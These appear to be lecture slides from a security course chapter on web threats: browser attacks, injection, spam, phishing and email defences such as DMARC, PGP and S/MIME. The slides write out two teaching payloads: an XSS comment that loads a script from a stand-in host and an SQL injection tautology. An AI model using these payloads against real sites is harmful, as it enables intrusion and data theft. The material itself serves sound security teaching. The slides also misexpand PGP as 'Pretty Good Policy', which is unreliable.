Security in Computing

Chapter 2: The Web

1
Chapter 2 Objectives
• Attacks against browsers
• Fake and malicious websites
• Attacks targeting sensitive data
• Injection attacks
• Spam
• Phishing attacks

2
Introduction
Browser are the software most users perceive as the gateway to the Internet.
Security issues for browsers arise from several complications to that simple description, such as
these:
• A browser often connects to more than the one address shown in the browser’s address bar.
• Fetching data can entail accesses to numerous locations to obtain pictures, audio content,
and other linked content.
• Browser software can be malicious or can be corrupted to acquire malicious functionality.
• Popular browsers support add-ins, extra code to add new features to the browser, but these
add-ins themselves can include corrupting code.
• Data display involves a rich command set that controls rendering, positioning, motion,
layering, and even invisibility.
• The browser can access any data on a user’s computer (subject to access control restrictions);
generally the browser runs with the same privileges as the user.
• Data transfers to and from the user are invisible, meaning they occur without the user’s
knowledge or explicit permission.
On a local computer you might constrain a spreadsheet program so it can access files in only
certain directories. Unfortunately, none of these limitations are applicable to browsers.

3
Browser Vulnerabilities

4
Web Surfing Process

5
Web Surfing Process
When we use any web-application like internet banking.

6
Web surfing for web Application

7
In this system ,in LAN it consist of the application sever and the database server
which will only accept the boundry inputs only. Before LAN there is internal
firewall and before it there is DMZ(De-Millitiarze Zone) and before it there is
external firewall. If attacker want to attack on website first it attack on external
firewall and DMZ. In this section, System Admin who can lookup on log and what
changes are happening in input and what type of attack, attacker tries to design
can analyze and stops it and that input does not pass through the internal firewall.
If we see the diagram ,on right hand side is quite secure as we have internal
firewall,external firewall and DMZ as defense mechanism where as on left hand
side i.e the users browser side there is no such defense mechanism except the
antivirus on the system. Antiviruses are signature based, it can detect the attack if
its signature are stored in it. Hence, Attackers shift there target from attacking
the website/webapplication to attack the web browser.

8
Browser Attack Types
• Man-in-the-browser
• Keystroke logger
• Page-in-the-middle
• Program download substitution
• User-in-the-middle

9
Man-in-the-Browser

10
Keystroke Logger
• Hardware or software that records all
keystrokes
• May be a small dongle plugged into a
USB port or can masquerade as a
keyboard
• May also be installed as malware
• Not limited to browsers

11
Page-in-the-Middle
• User is directed to a different page than
believed or intended
• Similar effect to a man-in-the-browser,
where attacker can intercept and modify
user input

12
Program Download Substitution
• Attacker creates a page with seemingly
innocuous and desirable programs for
download
• Instead of, or in addition to, the intended
functionality, the user installs malware
• This is a very common technique for spyware

13
User-in-the-Middle
Using click-bait to trick users into solving
CAPTCHAs on spammers’ behalf

14
Successful Authentication
The attacks listed above are largely failures of
authentication
Can be mitigated with
• Shared secret
• One-time password
• Out-of-band communication

15
Fake Website

16
Fake Code

17
Tracking Bug

18
Clickjacking

19
Drive-By Download
• Code is downloaded, installed, and executed on a
computer without the user’s knowledge
• May be the result of clickjacking, fake code, program
download subsitution, etc .

20
Cross-Site Scripting (XSS)
• Tricking a client or server into executing scripted code
by including the code in data inputs
• Scripts and HTML tags are encoded as plaintext just like
user inputs, so they can take over web pages similarly
to the way buffer overflow attacks can take over
programs

Cool<br>story.<br>KCTVBigFan<script
src=http://badsite.com/xss.js></script>

21
SQL Injection
Injecting SQL code into an exchange between an application and its database
server
Example:
• Loading an SQL query into a variable, taking the value of acctNum from an arbitrary user input
field:
• QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + " '; "
• The same query with malicious user input:
• QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "

22
Dot-Dot-Slash
• Also known as “directory traversal,” this is when
attackers use the term “../” to access files that are on
the target web server but not meant to be accessed
from outside
• Most commonly entered into the URL bar but may also
be combined with other attacks, such as XSS

23
Server-Side Include (SSI)
• SSI is an interpreted server-side scripting language that
can be used for basic web server directives, such as
including files and executing commands
• As is the case with XSS, some websites are vulnerable
to allowing users to execute SSI directives through text
input

24
Countermeasures to Injections
• Filter and sanitize all user input
• Need to account for every potentially valid encoding
• Make no assumptions about the range of possible user
inputs—trust nothing, check everything
• Use access control mechanisms on backend servers,
such as “stored procedures ”

25
Email Spam
Experts estimate that 60% to 90% of all email is spam
Types of spam:
• Advertising
• Pharmaceuticals
• Stocks
• Malicious code
• Links for malicious websites

Spam countermeasures
• Laws against spam exist but are generally ineffective
• Email filters have become very effective for most spam
• Internet service providers use volume limitations to make spammers’
jobs more difficult
26
What is email spoofing?
• One reason email attacks succeed is that the headers
on email are easy to spoof, and thus recipients believe
the email has come from a safe source.
• In email spoofing, an attacker uses an email header to
mask their own identity and impersonate a legitimate
sender. (An email header is a code snippet that contains
important details about the message such as the
sender, the recipient, and tracking data.)

27
How to protect against email spoofing
• Be wary of messages encouraging action quickly or
urgently
• Inspect email headers
• Use software that filters spoofed messages
• Domain owners can also take action to prevent
attackers from sending messages from their domain. To
do so, organizations can create Domain Name System
(DNS) records specifically for authentication. These
include:
• SPF records
• DKIM records
• DMARC records
28
 Phishing
Phishing – Cybercriminal attempts to steal personal and financial information or infect
computers and other devices with malware and viruses
• Designed to trick you into clicking a link or providing personal or financial information
• Often in the form of emails and websites
• May appear to come from legitimate companies, organizations or known individuals
• Take advantage of natural disasters, epidemics, health scares, political elections or timely
events

Different forms such as:

• Mass Phishing – Mass, large-volume attack intended to reach as many people as possible
• Whaling – Type of spear phishing attack that targets “big fish,” including high-profile
individuals or those with a great deal of authority or access
• Clone Phishing – Spoofed copy of a legitimate and previously delivered email, with
original attachments or hyperlinks replaced with malicious versions, which is sent from a
forged email address so it appears to come from the original sender or another legitimate
source
• Advance-Fee Scam: Requests the target to send money or bank account information to
the cybercriminal
• And Spear Phishing…..
 Spear Phishing
• Spear phishing is on the rise because it works. Traditional security defences do not detect and stop it.

• From a cyber criminal’s point of view, spear phishing is the perfect vehicle for a broad array of damaging
exploits.

• Threat actors are increasingly targeting executives and other high-level employees, tricking them into
activating malware that gives criminals access into their companies’ environments.

• This might be ransomware that encrypts company data, then extorts fees from the victim to remediate the
situation. Targeted executives are usually key leaders with titles such as chief financial offi cer, head of
finance, senior vice president and director.

• Spear phishing emails tend to have enough detail to fool even experienced security professionals.

• A phishing campaign may blanket an entire database of email addresses, but spear phishing targets
specific individuals within specific organizations with a specific mission.

• By mining social networks for personal information, an attacker can write emails that are extremely
accurate and compelling.

• Once the target clicks on a link or opens an attachment, the attacker establishes a foothold in the network,
enabling them to complete their illicit mission.

• 84% of organizations said a spear-phishing attack successfully penetrated their organization in 2015
Common Baiting Tactics

• Notification from a help desk or system administrator

Asks you to take action to resolve an issue with your account (e.g., email account has reached its storage limit),
which often includes clicking on a link and providing requested information.

• Advertisement for immediate weight loss, hair growth or fitness prowess

Serves as a ploy to get you to click on a link that will infect your computer or mobile device with malware or
viruses.

• Attachment labeled “invoice” or “shipping order”

Contains malware that can infect your computer or mobile device if opened. May contain what is known as
“ransomware,” a type of malware that will delete all files unless you pay a specified sum of money.

• Notification from what appears to be a credit card company

Indicates someone has made an unauthorized transaction on your account. If you click the link to log in to verify
the transaction, your username and password are collected by the scammer.

• Fake account on a social media site

Mimics a legitimate person, business or organization. May also appear in the form of an online game, quiz or
survey designed to collect information from your account.
Phishing Lure
Often makes it
look like a
problem with one
of your accounts
• Or they try to takes
advantage of an
ongoing
humanitarian crisis
Can you detect a phishing scam?
Common phishing scam Subject Lines
Barracuda Networks researchers compiled a list of the top 12 most common subject lines
used in phishing emails targeting businesses.
Researchers analyzed over 360,000 phishing emails & found the most common subject
line used in attacks is simply ‘Request’ – accounting for over a third of all the phishing
messages analyzed.

The report found the top 12 subject lines were as followed:

1. Request
2. Follow up
3. Urgent/Important
4. Are you available?/Are you at your desk?
5. Payment Status
6. Hello
7. Purchase
8. Invoice Due
9. Re:
10. Direct Deposit
11. Expenses
12. Payroll
Spear Phishing Characteristics
A spear-phishing attack can display one or more of the following characteristics:

• Blended or multi-vector threat. Spear phishing uses a blend of email spoofing, dynamic
URLs and drive-by downloads to bypass traditional defenses.

• Use of zero-day vulnerabilities. Advanced spear-phishing attacks leverage zero-day

vulnerabilities in browsers, plug-ins and desktop applications to compromise systems.

• Multi-stage attack. The initial exploit of systems is the first stage of an APT attack that
involves further stages of malware outbound communications, binary downloads and
data exfiltration.

• Well-crafted email forgeries: Spearphishing email threats are usually targeted to

individuals, so they don’t bear much resemblance to the high-volume, broadcast spam
that floods the Internet. This means traditional reputation and spam filters routinely miss
these messages, rendering traditional email protections ineffective.
 How to protect against phishing
STOP. THINK. CONNECT.
• Before you click, look for common baiting tactics e.g. Requests for personal information, Announcement indicating you won a prize or
lottery or Requests for donations
• Look for spelling errors (e.g., “pessward”), lack of punctuation or poor grammar
• Hyperlinked URL differs from the one displayed, or it is hidden
• Threatening language that calls for immediate action
Install and maintain antivirus software on your electronic devices

Use email filters to reduce spam and malicious traffi c

Be wary of messages asking for passwords or other personal information

• All reputable businesses and organizations will never ask for your password via email

Never send passwords, bank account numbers or other private information in an email
• Do not reply to requests for this information
• Verify by contacting the company or individual, but do not use the contact information included in the message

Do not click on any hyperlinks in the email

• User your computer mouse to hover over each link to verify its actual destination, even if the message appears to be from a trusted
source
• Pay attention to the URL and look for a variation in spelling or different domain (e.g., ulster.ac vs. ulster.com)
• Consider navigating to familiar sites on your own instead of using links within messages

Examine websites closely

• Malicious websites may look identical to legitimate sites
• Look for “https://” or a lock icon in the address bar before entering any sensitive information on a website
Best Practice for companies - DMARC
Organisations should set up DMARC which is Domain-based Message
Authentication, Reporting and Conformance email standard that:
1. confirms the sender’s identity using Sender Policy Framework (SPF) and DomainKeys
Identified Mail (DKIM)
2. tells the recipient’s email service what to do with emails that fail the check
3. asks recipient email services to provide reports of where email comes from

The benefit of DMARC are:

• Protecting your users, employees and reputation from cybercrime
• Reducing customer support costs relating to email fraud
• Improving trust in the emails your organisation sends
• Seeing the legitimate and fraudulent use of your domains via DMARC reports
Multi layered approach
PGP(Pretty Good Policy)
It was invented by Phil Zimmerman in 1991. PGP addresses the key distribution problem
with what is called a “ring of trust” or a user’s “keyring.” One user directly gives a public
key to another, or the second user fetches the first’s public key from a server. And one
person can give a second person’s key to a third (and a fourth, and so on).
The PGP processing performs some or all of the following actions, depending on whether
confidentiality, integrity, authenticity, or some combination of these is selected:
• Create a random session key for a symmetric algorithm.
• Encrypt the message, using the session key (for message confidentiality).
• Encrypt the session key under the recipient’s public key.
• Generate a message digest or hash of the message; sign the hash by encrypting
it with the sender’s private key (for message integrity and authenticity).
• Attach the encrypted session key to the encrypted message and digest.
• Transmit the message to the recipient.

The recipient reverses these steps to retrieve and validate the message content.

39
S/MIME (Secure Multipurpose Internet Mail
Extensions)
An Internet standard governs how email is sent and received. The general
MIME specification defines the format and handling of email attachments.
The principal difference between S/MIME and PGP is the method of key
exchange. Basic PGP depends on each user’s exchanging keys with all
potential recipients and establishing a ring of trusted recipients; it also
requires establishing a degree of trust in the authenticity of the keys for
those recipients. S/MIME uses hierarchically validated certificates, usually
represented in X.509 format, for key exchange.

40